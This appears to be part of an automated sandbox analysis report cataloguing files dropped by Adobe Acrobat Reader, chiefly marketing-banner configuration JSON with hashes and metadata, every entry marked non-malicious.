                                                Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):295
                                                Entropy (8bit):5.368919946120315
                                                Encrypted:false
                                                SSDEEP:6:YEQXJ2HXPoxvlRBKHVoZcg1vRcR0YloAvJM3g98kUwPeUkwRe9:YvXKXwxvlRXZc0vhGMbLUkee9
                                                MD5:4A734AA3449522C2C63A5402DE63006F
                                                SHA1:767BD0433026AE69F02F5D91B8AB49277804C91B
                                                SHA-256:D69488C48B3482C76A5A5315A2635EC1AD1BBFBA4FAA59896B4111DD831B5550
                                                SHA-512:188894B04EFFFCF0561BCDD05E3BB7A9AFFAF408FD5D4C387F335CF020AEE9F6D796463D4E02204CE3412C06595B0C357C74927AB6E625D59BEEC65859287F75
                                                Malicious:false
                                                Preview:{"analyticsData":{"responseGUID":"8d6058b5-6598-4dc5-8875-7a6c4abddc07","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730419031274,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):294
                                                Entropy (8bit):5.322036991961319
                                                Encrypted:false
                                                SSDEEP:6:YEQXJ2HXPoxvlRBKHVoZcg1vRcR0YloAvJfBoTfXpnrPeUkwRe9:YvXKXwxvlRXZc0vhGWTfXcUkee9
                                                MD5:59222CF228220D75824B1A3F443203BE
                                                SHA1:395946A1BBFAB1D3B8EF41C9D7B5744D0C2E44CD
                                                SHA-256:3E49A25780E96B2554715477E62AB4BDD41CC654C8A353A941B24B20B8F91BAA
                                                SHA-512:722A069B6DAFCE05000795CD8DADB469E1A1471B163EB416B0A177FE4D964755C1262D6786771EC8E4E31876E4B31B67E7188B70D3B94BD6BA34C5DE7CBD3D95
                                                Malicious:false
                                                Preview:{"analyticsData":{"responseGUID":"8d6058b5-6598-4dc5-8875-7a6c4abddc07","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730419031274,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):294
                                                Entropy (8bit):5.299580190179941
                                                Encrypted:false
                                                SSDEEP:6:YEQXJ2HXPoxvlRBKHVoZcg1vRcR0YloAvJfBD2G6UpnrPeUkwRe9:YvXKXwxvlRXZc0vhGR22cUkee9
                                                MD5:C09FAE6BCC0C0D753DA2A3279EF38216
                                                SHA1:87AC83C977CAD9C449DA91CB6D1ECB11C29430DE
                                                SHA-256:8563F370B0BFDC407CFE064C0276E51C6ABDD4C977BA84F283326DE7E13DB0F4
                                                SHA-512:39EDBBA4CAAF0E6D21C8E6C632ED4E2F8A0ED31864B0F2A075F3C8690FE11670E3180F0A895B07D489A7666DC6619384BFFE2BBF38C3A8D5CEADE25A98E885BC
                                                Malicious:false
                                                Preview:{"analyticsData":{"responseGUID":"8d6058b5-6598-4dc5-8875-7a6c4abddc07","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730419031274,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):285
                                                Entropy (8bit):5.356125419326111
                                                Encrypted:false
                                                SSDEEP:6:YEQXJ2HXPoxvlRBKHVoZcg1vRcR0YloAvJfPmwrPeUkwRe9:YvXKXwxvlRXZc0vhGH56Ukee9
                                                MD5:C5742B46F7FCE6090837A50CD18DA668
                                                SHA1:492248A0611DFB868C6432216DC47994E8704889
                                                SHA-256:7744AC1094C1FF62598918D76EDF70B186ACC17E5C203A642EF4E52480C34A9F
                                                SHA-512:3D51A331A675B75E85C6AD2A9822EAD14DAB4A1CFB0787290E7A33259A87DBDAA7FB520DD24930F5967BE76A8F73838FFBA90054FA5775F6905A06AB9371FB0D
                                                Malicious:false
                                                Preview:{"analyticsData":{"responseGUID":"8d6058b5-6598-4dc5-8875-7a6c4abddc07","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730419031274,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):1055
                                                Entropy (8bit):5.6624488950742435
                                                Encrypted:false
                                                SSDEEP:24:Yv6XwllRXzvGpLgEscLf7nnl0RCmK8czOCCSt8:YvdllRj+hgGzaAh8cv/t8
                                                MD5:B09055B56A867F0DF18AB4CB178BAB52
                                                SHA1:D66E46E09829701FDABB69668B82DF7DAF5B066D
                                                SHA-256:675CF3000A88370AB09EF163C44E1AF5A8832FE34FF07457C881DAE0F638FF9C
                                                SHA-512:7985B138ADC584BE7DEDAEC1F32BFC0A694FA47C6D588CA619B47F7C8DBE23807A8472ECD5558C0C3FCECEDE933987FFC83448A9FB3F1ED3D7E3FE123B44CA67
                                                Malicious:false
                                                Preview:{"analyticsData":{"responseGUID":"8d6058b5-6598-4dc5-8875-7a6c4abddc07","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730419031274,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"92038_285529ActionBlock_1","campaignId":92038,"containerId":"1","controlGroupId":"","treatmentId":"eb1a4bce-8215-46f1-b44c-154b21a85d60","variationId":"285529"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNhdElkIjpudWxsfQ==","dataType":"application\/json","encodingScheme":tr
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):1050
                                                Entropy (8bit):5.651755887421087
                                                Encrypted:false
                                                SSDEEP:24:Yv6XwllRXzvwVLgEF0c7sbnl0RCmK8czOCYHflEpwiVQ8:YvdllRjoFg6sGAh8cvYHWpwt8
                                                MD5:356BCD3A6E40202B28C659E7ACB852B8
                                                SHA1:B55DFD9A60F292DA65DD50B5E852E607951ABE72
                                                SHA-256:A8FC8062EA7A8C27FE24849CE0A62C5C2E3CE6E57C995FB948EA1D5B0AF96055
                                                SHA-512:A28888E0377AC552A44454C39C188835E5BC2E4CC0C0337BFB876ACC0ED822C5AE82B6DCF1BF89DE981C17B21DC6D2806D2C6F0D2F058EF3870988A0EC4D807A
                                                Malicious:false
                                                Preview:{"analyticsData":{"responseGUID":"8d6058b5-6598-4dc5-8875-7a6c4abddc07","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730419031274,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_0","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"0924134e-3c59-4f53-b731-add558c56fec","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuZm9ybXMgJiBhZ3JlZW1lbnRzLiJ9LCJ0Y2F0SWQiOm51bGx9","dataType":"application\/json","encodingScheme":true},"
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):292
                                                Entropy (8bit):5.3060583683008975
                                                Encrypted:false
                                                SSDEEP:6:YEQXJ2HXPoxvlRBKHVoZcg1vRcR0YloAvJfQ1rPeUkwRe9:YvXKXwxvlRXZc0vhGY16Ukee9
                                                MD5:712DD55D8D255DFA5BF4FC3DB5BE2669
                                                SHA1:3D4ECF9B3CAF5926E61A2AEE264E66BFC49892B3
                                                SHA-256:33F7312195BE1FC7612356458FF539970591CD04A956415663DA2B955823E035
                                                SHA-512:B113FF9CC90A882ACB4E0D281D650ABDF71750F3E670B6D5E0AFF77C08A1D4C8F7CAF030C191F48E3DAC16320ABFC4834C2CB0755115FE2C6364A40FBCCD006F
                                                Malicious:false
                                                Preview:{"analyticsData":{"responseGUID":"8d6058b5-6598-4dc5-8875-7a6c4abddc07","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730419031274,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):1038
                                                Entropy (8bit):5.644196294753859
                                                Encrypted:false
                                                SSDEEP:24:Yv6XwllRXzvV2LgEF7cciAXs0nl0RCmK8czOCAPtciBQ8:YvdllRjtogc8hAh8cvAm8
                                                MD5:1C38A9044AE4E65A7F8D2CF102274A1D
                                                SHA1:2CA15CA009F2BBB9358E3AED2DF1D18311F81EE0
                                                SHA-256:F6153E79C5B8BB4ED68B5B88A7EAD2787B2425E0CAE8DB9EBB9D4CCA547673AA
                                                SHA-512:7AE9E83DF18E8D910AB497070292EDF17FD0F247B1F66831CFB12D6B840B18C88F33EAA35652D81E878EFA94B127F92CCD24B3CC0CD501AE4529AF33AAA74CF2
                                                Malicious:false
                                                Preview:{"analyticsData":{"responseGUID":"8d6058b5-6598-4dc5-8875-7a6c4abddc07","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730419031274,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_1","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"49d2f713-7aa9-44db-aa50-0a7a22add459","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVkaXQgdGV4dCwgaW1hZ2VzLCBwYWdlcywgYW5kIG1vcmUuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"application\/json","encodingScheme":true},"endDTS":1744
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):1164
                                                Entropy (8bit):5.698135643881483
                                                Encrypted:false
                                                SSDEEP:24:Yv6XwllRXzv9KLgEfIcZVSkpsn264rS514ZjBrwloJTmcVIsrSK5Q8:YvdllRjFEgqprtrS5OZjSlwTmAfSKi8
                                                MD5:D970D00B62EAD93348EB8C61624BFFEC
                                                SHA1:5BE0324D0DB9408EF470FC12D09FBC13BAE23F0C
                                                SHA-256:F5E46F2265A5ACC59E677810B0A5EAE3B2D5BEBAC3824D8AA1B7A42E78115CC9
                                                SHA-512:63DC1A4C1F359D768CECDE6AA82E7F56E3F1827720E0A89C102B38418DC683E389DD20EF9276B9C4BE6DBAF169608036586C07731487E50B46F1E6C9FB30BC67
                                                Malicious:false
                                                Preview:{"analyticsData":{"responseGUID":"8d6058b5-6598-4dc5-8875-7a6c4abddc07","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730419031274,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):289
                                                Entropy (8bit):5.308925259728758
                                                Encrypted:false
                                                SSDEEP:6:YEQXJ2HXPoxvlRBKHVoZcg1vRcR0YloAvJfYdPeUkwRe9:YvXKXwxvlRXZc0vhGg8Ukee9
                                                MD5:4A5DD5031918B232B408BCD76B350451
                                                SHA1:268E1FA49D88DC8DDCDFEB80429820951ABE647B
                                                SHA-256:6F213A0626AF7A0B9B1A5F4ABC4D4487473F06265A1C0CEBDAC489F3E7192C73
                                                SHA-512:266E175BC8031616F6C2B23C30722AC86E931A39921C8AE813F83F16A0D14EBDB56BA238636BB501D1B5325330DE9DD08C0F2BEC78FEA85335433588F4BB977A
                                                Malicious:false
                                                Preview:{"analyticsData":{"responseGUID":"8d6058b5-6598-4dc5-8875-7a6c4abddc07","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730419031274,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):1395
                                                Entropy (8bit):5.777879328911445
                                                Encrypted:false
                                                SSDEEP:24:Yv6XwllRXzvArLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNY8:YvdllRj4HgDv3W2aYQfgB5OUupHrQ9F3
                                                MD5:258DD6AA238FBF5A21B3D84B2C953E24
                                                SHA1:D5BAD1A599B7C100340B22DA368B93A056F3D73E
                                                SHA-256:5061086B97842740D3498372D02492784AF1672D18512E3E5BC078DDB2181564
                                                SHA-512:FC32A163AFAEF31CEF7DA82CFAA0B4037850201B37BC7119CDB6A845545BDDFED6773C274D67C199DA946EF46970455B5A8EF7E3021D9A8168F027F1DFB8F377
                                                Malicious:false
                                                Preview:{"analyticsData":{"responseGUID":"8d6058b5-6598-4dc5-8875-7a6c4abddc07","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730419031274,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):291
                                                Entropy (8bit):5.29241101541136
                                                Encrypted:false
                                                SSDEEP:6:YEQXJ2HXPoxvlRBKHVoZcg1vRcR0YloAvJfbPtdPeUkwRe9:YvXKXwxvlRXZc0vhGDV8Ukee9
                                                MD5:E80084C0D59505820E49E840CF603D3A
                                                SHA1:24575170DC0E5D55525A94C458E39F703FAEE10C
                                                SHA-256:4A4EEB55103705CF435CF19AA6F17445CFBD7DB693FB3E14CDBA93B4A0275EFF
                                                SHA-512:1F459052CB39BBC285C81645E6EA8018D86152EA4937A7F115EBED3173FCC2BF4C93D835B9FC689737739CB7648E6BDF25345067ABEEB1C789FC2CD125A626E9
                                                Malicious:false
                                                Preview:{"analyticsData":{"responseGUID":"8d6058b5-6598-4dc5-8875-7a6c4abddc07","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730419031274,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):287
                                                Entropy (8bit):5.297186006970755
                                                Encrypted:false
                                                SSDEEP:6:YEQXJ2HXPoxvlRBKHVoZcg1vRcR0YloAvJf21rPeUkwRe9:YvXKXwxvlRXZc0vhG+16Ukee9
                                                MD5:793FB9CCA680DBF08C08CE6C458597C5
                                                SHA1:FFE10FB80AD245D5DCFEF611812A7E3FF49298D9
                                                SHA-256:7E7D51D86516D2258F028D14EEA20208A363B93B3FCB1C8BE07A8571C6B5D024
                                                SHA-512:4554F1108D4B12737D2F005EB7466BE111A8245CFB8EC7D255B974F3C4CB49F6C08000A289B97545E7828CA31419D410B88180D5CFDE0CB767830EE1BC1ABD97
                                                Malicious:false
                                                Preview:{"analyticsData":{"responseGUID":"8d6058b5-6598-4dc5-8875-7a6c4abddc07","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730419031274,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):1026
                                                Entropy (8bit):5.6335148499231655
                                                Encrypted:false
                                                SSDEEP:24:Yv6XwllRXzvaamXayLgE7cMCBNaqnl0RCmK8czOC/BSt8:YvdllRj8BgACBOAh8cvMt8
                                                MD5:EA508E888413E97B53A73492F09957F5
                                                SHA1:12C32ED37A9565E823D40BF45E3F7FA5954B4FCD
                                                SHA-256:E732731DF5145E21B744250FBCCB6EAD08081C23D0797FA0684CB7B4C5A944D4
                                                SHA-512:36A3ABE3FBCA96CE2A87F04F9F848CEA7C673867FD7BED088D9D620D67155DB6FB2C55AB4818FCC4DC836A9EC4F8E006381122EDE50AE26B88F8BA4497D06805
                                                Malicious:false
                                                Preview:{"analyticsData":{"responseGUID":"8d6058b5-6598-4dc5-8875-7a6c4abddc07","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730419031274,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"92038_285529ActionBlock_0","campaignId":92038,"containerId":"1","controlGroupId":"","treatmentId":"6291f52b-6cb0-4d31-bc46-37ce85e9eb25","variationId":"285529"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"application\/json","encodingScheme":true},"endDTS":1751323379000,"s
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):286
                                                Entropy (8bit):5.2706786319097425
                                                Encrypted:false
                                                SSDEEP:6:YEQXJ2HXPoxvlRBKHVoZcg1vRcR0YloAvJfshHHrPeUkwRe9:YvXKXwxvlRXZc0vhGUUUkee9
                                                MD5:4A2D5F0F6103B3F381C9E9EDD584CC24
                                                SHA1:60E69BBA5C4017156E16DEAD0517136B62B3838E
                                                SHA-256:E69AECAA3D99E12E8B197006D5519F493F79EAD398A05D2AB8897617A70539FC
                                                SHA-512:13AEE6B5283E575E2AE4BF706EDF32B24F372B4B8E823D037F14542AA208CF547A7C85962DD3886C4892E9A8ABD23A13184A29831C7C43C7A44FA8D75F255713
                                                Malicious:false
                                                Preview:{"analyticsData":{"responseGUID":"8d6058b5-6598-4dc5-8875-7a6c4abddc07","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730419031274,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):782
                                                Entropy (8bit):5.367924979875504
                                                Encrypted:false
                                                SSDEEP:12:YvXKXwxvlRXZc0vhGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWsbY:Yv6XwllRXzvt168CgEXX5kcIfANht8
                                                MD5:8D66FC45D3860F31F9AFDDBDEB9C3054
                                                SHA1:4B80A4F67A232168C5046E99C760FE704B1318A4
                                                SHA-256:DC35AC707632A57EEBDF4B3D5FC315125A3B9E666D0E1B5EDE9E1E20CD1A2BE1
                                                SHA-512:49D23B885037A1F4E4C7E69274620D6E3391D700F4886C9D5C903F6E80C02A1D55C750316C5E205CF81A1443BF2F70FAA64A57E5A3E256FD6A6036E2CA529345
                                                Malicious:false
                                                Preview:{"analyticsData":{"responseGUID":"8d6058b5-6598-4dc5-8875-7a6c4abddc07","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730419031274,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1730244116308}}}}
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):4
                                                Entropy (8bit):0.8112781244591328
                                                Encrypted:false
                                                SSDEEP:3:e:e
                                                MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                Malicious:false
                                                Preview:....
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):2818
                                                Entropy (8bit):5.12447348441253
                                                Encrypted:false
                                                SSDEEP:48:Y/aNroAbcriWjABIzZ+dPzY3ccRBHqudo3VTh9AMIEz:9bcZtd3FxdCT/9
                                                MD5:F371C474FE850A3C2CB3596B6EDACD73
                                                SHA1:3B07342A5A941682676C0D34884077FE4A6CF205
                                                SHA-256:F4A72B64FCBC34F26AC1DBFD876FE93DBA2220858F9C52CB3DFFFFE6EF4A5CE9
                                                SHA-512:58D12205FC9AFD3514997CB782B72AAB425048CD416A603C83BB60573092EFA972DD99950FC4C09F58B5EB818AF4D40BC4422FF96348AAAE85AC3D0B8B33B7B9
                                                Malicious:false
                                                Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"92a8ec2e35d40bdb28df6549fa710c87","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1050,"ts":1730244115000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"14083d3bf3c697234e8df6aa1091f4c4","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1730244115000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"f5eb49b5fe0485e6bbaf468b21c9f29b","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1026,"ts":1730244115000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"8ebac71c494308a05880a3ade3a3c1e5","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1055,"ts":1730244115000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"5d2a6cd46127d8ad151baa4acfc62856","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1038,"ts":1730244115000},{"id":"Edit_InApp_Aug2020","info":{"dg":"e4727162d5b426d535e7f5011618842c","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                Category:dropped
                                                Size (bytes):12288
                                                Entropy (8bit):1.1871874416083037
                                                Encrypted:false
